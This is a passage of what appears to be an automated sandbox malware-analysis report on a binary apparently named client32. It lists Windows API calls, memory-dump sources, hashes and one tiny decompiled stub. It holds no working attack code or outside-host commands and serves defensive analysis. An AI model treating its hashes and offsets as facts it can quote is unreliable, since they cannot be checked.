                                                                                                                                    • Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
                                                                                                                                    • Opcode Fuzzy Hash: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                                                                    • Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11171DC8 Relevance: 3.1, APIs: 2, Instructions: 61COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000,00000000,00000109,?,1117A173,00000109), ref: 11171E1A
                                                                                                                                    • GetLastError.KERNEL32(?,1117A173,00000109), ref: 11171E24
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1687624791-0
                                                                                                                                    • Opcode ID: 005259e30cef830dbe38552925d151346e901dc108b60405fbdbdbe36d581b4a
                                                                                                                                    • Instruction ID: 69c046a01a19fd92a8a48d11fc678665ec3cc7002fceffcc41a1766b86b0f32f
                                                                                                                                    • Opcode Fuzzy Hash: 005259e30cef830dbe38552925d151346e901dc108b60405fbdbdbe36d581b4a
                                                                                                                                    • Instruction Fuzzy Hash: D8014E375146765AE30315749A4CB8AFB4A4F8273CF250539E838AB7C4EF61D442C250
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11145010 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
                                                                                                                                    • ExtractIconExA.SHELL32(?,00000000,000D0433,00040485,00000001), ref: 11145068
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExtractFileIconModuleName
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3911389742-0
                                                                                                                                    • Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                                                                    • Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
                                                                                                                                    • Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                                                                    • Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11165E4D Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1116AC39: Sleep.KERNEL32(00000000,00000001,?,?,1117452A,00000018,111DD378,0000000C,111745BA,?,?,?,1116C592,0000000D), ref: 1116AC5A
                                                                                                                                    • InterlockedDecrement.KERNEL32(00000000), ref: 1116613B
                                                                                                                                      • Part of subcall function 1116ED72: GetCurrentProcess.KERNEL32(C0000417,1103179F,?), ref: 1116ED88
                                                                                                                                      • Part of subcall function 1116ED72: TerminateProcess.KERNEL32(00000000), ref: 1116ED8F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CurrentDecrementInterlockedSleepTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2353184006-0
                                                                                                                                    • Opcode ID: 6202c7366e34eebdfeebf5dcbb91b53c2b52e77d1e4a66de11cbd6797e6709d6
                                                                                                                                    • Instruction ID: 28820983dffb07a1d92f1041c7fe706261931c6ba34d7544a93cb296ae6e554e
                                                                                                                                    • Opcode Fuzzy Hash: 6202c7366e34eebdfeebf5dcbb91b53c2b52e77d1e4a66de11cbd6797e6709d6
                                                                                                                                    • Instruction Fuzzy Hash: C8B10A75A002199FDB65CF64CD90BDAF7B8EF49308F1085A9E909D7250EB72AA94CF40
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11143BD0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,762DC740,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: QueryValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                    • Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                                                                    • Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
                                                                                                                                    • Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                                                                    • Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11163A11 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                                      • Part of subcall function 1116E6AE: GetModuleFileNameW.KERNEL32(00000000,111F2A0A,00000104,00000001,?,00000000), ref: 1116E74A
                                                                                                                                      • Part of subcall function 1116E3ED: ExitProcess.KERNEL32 ref: 1116E3FE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateExitFileHeapModuleNameProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1715456479-0
                                                                                                                                    • Opcode ID: 094ddabd615bf6a70589f6454a841c5c150d00740610431014c3cd3d6461da9e
                                                                                                                                    • Instruction ID: 2d64c0ba41061e5db5df7d6cee10c0d73bc284de10758aa3972f6f1dba59dc4b
                                                                                                                                    • Opcode Fuzzy Hash: 094ddabd615bf6a70589f6454a841c5c150d00740610431014c3cd3d6461da9e
                                                                                                                                    • Instruction Fuzzy Hash: 9001283A769327AEF2015A769C90B5EF79DAF816BCF110135E928C6180EEF3D460D721
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11170FC4 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                    • Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                                                                    • Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
                                                                                                                                    • Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                                                                    • Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116D88B Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlEncodePointer.NTDLL(299909AE,?,?,1116E49A,?,1116A3EA,00000000,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116D897
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EncodePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2118026453-0
                                                                                                                                    • Opcode ID: 892c7a70bfa0a0ee57f88deaa6386a65f1bb35a9811ee1064a168a8f4d2ba12c
                                                                                                                                    • Instruction ID: 41db405c2ea97ca4b9447f6740fb52fb689d41e7fea88c79150b623c1d65c238
                                                                                                                                    • Opcode Fuzzy Hash: 892c7a70bfa0a0ee57f88deaa6386a65f1bb35a9811ee1064a168a8f4d2ba12c
                                                                                                                                    • Instruction Fuzzy Hash: 1DC012735161116687120E7AFC8884BAF3BFAC22343020236E169431148B7014F3C750
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116E390 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • HeapCreate.KERNEL32(00000000,00001000,00000000,1116A38C,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116E399
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 10892065-0
                                                                                                                                    • Opcode ID: 142c5a5c4919cb09405da71cffe6635c1363fd53243120eb8959baaf8568cbb1
                                                                                                                                    • Instruction ID: 86b0d77b763399ceea6a4f6bcd840a86565e65045cc391439eb0f9b33b18d734
                                                                                                                                    • Opcode Fuzzy Hash: 142c5a5c4919cb09405da71cffe6635c1363fd53243120eb8959baaf8568cbb1
                                                                                                                                    • Instruction Fuzzy Hash: 3BC09B7078231357F75847755C677457594770CB5BF104139F117D99C4E69094505F04
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 011E1000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                    			E011E1000(intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _t3;

				_t3 = _a16;
				_push(_t3);
				_push(_a12); // executed
				L011E10AA(); // executed
				return _t3;
			}




                                                                                                                                    0x011e1003
                                                                                                                                    0x011e1009
                                                                                                                                    0x011e100a
                                                                                                                                    0x011e100b
                                                                                                                                    0x011e1011

                                                                                                                                    APIs
                                                                                                                                    • _NSMClient32@8.PCICL32(?,?,?,011E10A2,00000000), ref: 011E100B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.654098348.00000000011E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 011E0000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.654083609.00000000011E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.654110401.00000000011E2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11e0000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Client32@8
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 433899448-0
                                                                                                                                    • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                                                    • Instruction ID: c665625b0bd878910f1982547523d86bc5befe176b834759bfb7d9b7878d445e
                                                                                                                                    • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                                                    • Instruction Fuzzy Hash: D1B092B221434EAB8718EE98E844C7B33DCAAA8600B000909FD0543281CA71FC209671
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116C488 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlEncodePointer.NTDLL(00000000,11178B2B,111F29D8,00000314,00000000,?,?,?,?,?,1116E7EB,111F29D8,Microsoft Visual C++ Runtime Library,00012010), ref: 1116C48A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EncodePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2118026453-0
                                                                                                                                    • Opcode ID: 034736193946d95bcfb76139b375fa58cd735bbaf493e69cf92d6cc7d133de75
                                                                                                                                    • Instruction ID: 85178daedb8e135e59ea49443ffa37c172a2f839626d84bfb77205dd36a12bfe
                                                                                                                                    • Opcode Fuzzy Hash: 034736193946d95bcfb76139b375fa58cd735bbaf493e69cf92d6cc7d133de75
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1115CCA0 Relevance: 1.4, APIs: 1, Instructions: 158COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
